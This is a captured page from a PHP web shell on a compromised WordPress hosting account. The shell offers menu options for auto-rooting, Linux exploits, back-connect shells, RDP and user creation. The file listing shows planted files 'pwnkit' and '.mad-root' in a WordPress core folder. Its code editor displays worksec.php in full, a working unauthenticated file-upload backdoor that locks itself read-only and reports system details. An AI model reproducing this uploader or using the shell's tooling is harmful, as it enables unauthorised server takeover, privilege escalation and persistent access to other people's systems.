Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-includes /
block-supports /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
align.php
1.67
KB
-rw-r--r--
anchor.php
1.54
KB
-rw-r--r--
aria-label.php
1.65
KB
-rw-r--r--
auto-register.php
2.18
KB
-rw-r--r--
background.php
4.05
KB
-rw-r--r--
block-style-variations.php
9.28
KB
-rw-r--r--
block-visibility.php
5.23
KB
-rw-r--r--
border.php
6.1
KB
-rw-r--r--
colors.php
5.39
KB
-rw-r--r--
custom-classname.php
1.64
KB
-rw-r--r--
custom-css.php
9.37
KB
-rw-r--r--
dimensions.php
5.21
KB
-rw-r--r--
duotone.php
2.67
KB
-rw-r--r--
elements.php
8.2
KB
-rw-r--r--
generated-classname.php
1.7
KB
-rw-r--r--
layout.php
42.31
KB
-rw-r--r--
position.php
4.01
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
settings.php
4.45
KB
-rw-r--r--
shadow.php
2.04
KB
-rw-r--r--
spacing.php
2.68
KB
-rw-r--r--
typography.php
27.68
KB
-rw-r--r--
utils.php
1011
B
-rw-r--r--
worksec.php
1.06
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close